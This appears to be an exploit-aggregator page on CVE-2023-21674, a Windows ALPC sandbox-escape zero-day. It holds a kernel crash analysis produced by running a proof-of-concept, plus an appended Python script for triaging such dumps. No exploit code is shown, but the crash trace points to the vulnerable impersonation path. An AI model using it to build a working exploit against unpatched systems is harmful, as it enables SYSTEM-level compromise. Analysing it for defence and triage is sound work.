## https://sploitus.com/exploit?id=2E1E7548-DCD8-5F90-8769-9716BCD64AAA
First in-the-wild 0-day of 2023 🔥
CVE-2023-21674 is a vulnerability in Windows Advanced Local Procedure Call (ALPC), discovered by Avast, that could lead to a browser sandbox escape and allow attackers to gain SYSTEM privileges.

-------------------------------------------------------------------------------------------------------------------------

```text
kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffff98061bbf8820, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff8021a7120a4, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 0000000000000002, (reserved)

Debugging Details:
------------------


KEY_VALUES_STRING: 1

    Key  : AV.Type
    Value: Read

    Key  : Analysis.CPU.mSec
    Value: 1562

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 1654

    Key  : Analysis.Init.CPU.mSec
    Value: 421

    Key  : Analysis.Init.Elapsed.mSec
    Value: 13937

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 76

    Key  : WER.OS.Branch
    Value: ni_release

    Key  : WER.OS.Timestamp
    Value: 2022-05-06T12:50:00Z

    Key  : WER.OS.Version
    Value: 10.0.22621.1


FILE_IN_CAB:  MEMORY - Copy.DMP

DUMP_FILE_ATTRIBUTES: 0x1000

BUGCHECK_CODE:  50

BUGCHECK_P1: ffff98061bbf8820

BUGCHECK_P2: 0

BUGCHECK_P3: fffff8021a7120a4

BUGCHECK_P4: 2

READ_ADDRESS:  ffff98061bbf8820 Special pool

MM_INTERNAL_CODE:  2

BLACKBOXBSD: 1 (!blackboxbsd)


BLACKBOXNTFS: 1 (!blackboxntfs)


BLACKBOXPNP: 1 (!blackboxpnp)


BLACKBOXWINLOGON: 1

PROCESS_NAME:  CVE-2023-21674-POC.exe

TRAP_FRAME:  ffff838564a3f660 -- (.trap 0xffff838564a3f660)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffff9805f9a9c600 rbx=0000000000000000 rcx=ffff98061bbf8600
rdx=ffff9805f0492f24 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8021a7120a4 rsp=ffff838564a3f7f0 rbp=0000000000000000
 r8=0000000000000000  r9=ffff838564a3f920 r10=0000000000000000
r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
nt!SeCreateClientSecurity+0x54:
fffff802`1a7120a4 4c8bb120020000  mov     r14,qword ptr [rcx+220h] ds:ffff9806`1bbf8820=????????????????
Resetting default scope

STACK_TEXT:  
ffff8385`64a3f438 fffff802`1a480701     : 00000000`00000050 ffff9806`1bbf8820 00000000`00000000 ffff8385`64a3f660 : nt!KeBugCheckEx
ffff8385`64a3f440 fffff802`1a24fe4c     : 00000000`00000000 00000000`00000000 ffff8385`64a3f5f9 00000000`00000000 : nt!MiSystemFault+0x2337d1
ffff8385`64a3f540 fffff802`1a437ddd     : ffff8385`64a3f6c0 fffff802`1a27419e 00000000`00000000 ffff9805`dd22f000 : nt!MmAccessFault+0x29c
ffff8385`64a3f660 fffff802`1a7120a4     : 00000000`00001301 ffffb989`a4084ce0 00000000`00000000 00000000`000009e8 : nt!KiPageFault+0x35d
ffff8385`64a3f7f0 fffff802`1a711dba     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!SeCreateClientSecurity+0x54
ffff8385`64a3f890 fffff802`1a711b9e     : ffff9805`fbffee20 ffff8385`64a3fb20 ffff9805`fbffee20 00000000`00000000 : nt!AlpcpImpersonateMessage+0x11a
ffff8385`64a3f9c0 fffff802`1a43b968     : 00000000`000000d4 ffff9805`fbffee20 00000000`00000000 00000000`00001210 : nt!NtAlpcImpersonateClientOfPort+0x15e
ffff8385`64a3faa0 00007fff`bc8cfe24     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x28
000000da`8352f238 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`bc8cfe24


SYMBOL_NAME:  nt!SeCreateClientSecurity+54

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

STACK_COMMAND:  .cxr; .ecxr ; kb

BUCKET_ID_FUNC_OFFSET:  54

FAILURE_BUCKET_ID:  AV_VRFK_R_(null)_nt!SeCreateClientSecurity

OS_VERSION:  10.0.22621.1

BUILDLAB_STR:  ni_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {9ec8eba5-8500-2db9-9fec-a2667249961f}

Followup:     MachineOwner
---------
```
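As an added example (not part of the original page or of the PoC it lists), the following Python script shows how a responder would triage a dump like the one above rather than reading it by hand: it parses the `!analyze -v` output for the bugcheck name and code, the four arguments, `PROCESS_NAME`, `READ_ADDRESS` and `STACK_TEXT`, then derives the facts that matter first, namely the frame that took the fault, the syscall through which the user-mode process reached it, and whether the bad address sat in Driver Verifier special pool. The sample input is the relevant sections copied from the analysis above; the class and function names are my own.

```python
"""Triage helper for WinDbg `!analyze -v` output (added example, not from the page)."""
import re
from dataclasses import dataclass, field

# Constructed sample input: the relevant sections of the crash analysis shown above.
SAMPLE = """\
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Arguments:
Arg1: ffff98061bbf8820, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff8021a7120a4, If non-zero, the instruction address which referenced the bad memory
\taddress.
Arg4: 0000000000000002, (reserved)

READ_ADDRESS:  ffff98061bbf8820 Special pool

PROCESS_NAME:  CVE-2023-21674-POC.exe

STACK_TEXT:  
ffff8385`64a3f438 fffff802`1a480701     : 00000000`00000050 ffff9806`1bbf8820 00000000`00000000 ffff8385`64a3f660 : nt!KeBugCheckEx
ffff8385`64a3f440 fffff802`1a24fe4c     : 00000000`00000000 00000000`00000000 ffff8385`64a3f5f9 00000000`00000000 : nt!MiSystemFault+0x2337d1
ffff8385`64a3f540 fffff802`1a437ddd     : ffff8385`64a3f6c0 fffff802`1a27419e 00000000`00000000 ffff9805`dd22f000 : nt!MmAccessFault+0x29c
ffff8385`64a3f660 fffff802`1a7120a4     : 00000000`00001301 ffffb989`a4084ce0 00000000`00000000 00000000`000009e8 : nt!KiPageFault+0x35d
ffff8385`64a3f7f0 fffff802`1a711dba     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!SeCreateClientSecurity+0x54
ffff8385`64a3f890 fffff802`1a711b9e     : ffff9805`fbffee20 ffff8385`64a3fb20 ffff9805`fbffee20 00000000`00000000 : nt!AlpcpImpersonateMessage+0x11a
ffff8385`64a3f9c0 fffff802`1a43b968     : 00000000`000000d4 ffff9805`fbffee20 00000000`00000000 00000000`00001210 : nt!NtAlpcImpersonateClientOfPort+0x15e
ffff8385`64a3faa0 00007fff`bc8cfe24     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x28
000000da`8352f238 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`bc8cfe24

SYMBOL_NAME:  nt!SeCreateClientSecurity+54
"""


@dataclass
class CrashReport:
    bugcheck_name: str = ""
    bugcheck_code: int = 0
    args: list = field(default_factory=list)      # Arg1..Arg4 as integers
    process_name: str = ""
    read_address: int = 0
    special_pool: bool = False
    stack: list = field(default_factory=list)     # symbols, innermost frame first

    @property
    def is_write(self) -> bool:
        # For bugcheck 0x50, Arg2 is 0 for a read and 1 for a write.
        return self.bugcheck_code == 0x50 and len(self.args) > 1 and self.args[1] == 1


_BUGCHECK_RE = re.compile(r"^([A-Z_]+) \(([0-9A-Fa-f]+)\)\s*$", re.M)
_ARG_RE = re.compile(r"^Arg(\d): ([0-9a-f]{16}),", re.M)


def parse_analysis(text: str) -> CrashReport:
    """Extract the triage-relevant fields from `!analyze -v` output."""
    rep = CrashReport()
    m = _BUGCHECK_RE.search(text)
    if m:
        rep.bugcheck_name, rep.bugcheck_code = m.group(1), int(m.group(2), 16)
    rep.args = [int(v, 16) for _, v in sorted(_ARG_RE.findall(text))]
    m = re.search(r"^PROCESS_NAME:\s+(\S+)", text, re.M)
    if m:
        rep.process_name = m.group(1)
    m = re.search(r"^READ_ADDRESS:\s+([0-9a-f]{16})(.*)$", text, re.M)
    if m:
        rep.read_address = int(m.group(1), 16)
        rep.special_pool = "Special pool" in m.group(2)
    # STACK_TEXT runs until the first blank line; the symbol is after the last " : ".
    m = re.search(r"^STACK_TEXT:.*?\n(.*?)\n\s*\n", text, re.M | re.S)
    if m:
        for line in m.group(1).splitlines():
            if " : " in line:
                rep.stack.append(line.rsplit(" : ", 1)[1].strip())
    return rep


def faulting_function(rep: CrashReport) -> str:
    """Symbol of the frame that took the page fault (the caller of KiPageFault)."""
    for i, sym in enumerate(rep.stack):
        if sym.startswith("nt!KiPageFault") and i + 1 < len(rep.stack):
            return rep.stack[i + 1]
    return ""


def syscall_entry(rep: CrashReport) -> str:
    """Syscall handler through which user mode entered the faulting kernel path."""
    for i, sym in enumerate(rep.stack):
        if sym.startswith("nt!KiSystemService") and i > 0:
            return rep.stack[i - 1]
    return ""


def summarize(rep: CrashReport) -> str:
    access = "write" if rep.is_write else "read"
    addr = rep.args[0] if rep.args else 0
    lines = [
        f"{rep.bugcheck_name} (0x{rep.bugcheck_code:x}): kernel {access} of 0x{addr:x}",
        f"faulting frame : {faulting_function(rep)}",
        f"syscall entry  : {syscall_entry(rep)}",
        f"user process   : {rep.process_name}",
    ]
    if rep.special_pool:
        lines.append("note: address is in Driver Verifier special pool, which typically "
                     "means freed or out-of-bounds memory was touched, not an unmapped page")
    return "\n".join(lines)


if __name__ == "__main__":
    print(summarize(parse_analysis(SAMPLE)))
```

Run against the sample, the summary reports a kernel read of `0xffff98061bbf8820` in `nt!SeCreateClientSecurity+0x54`, reached from the user process through `nt!NtAlpcImpersonateClientOfPort+0x15e`, with the special-pool note set; that combination (Verifier-flagged address, ALPC impersonation syscall, unprivileged caller) is what a responder would want surfaced before opening the dump in a debugger.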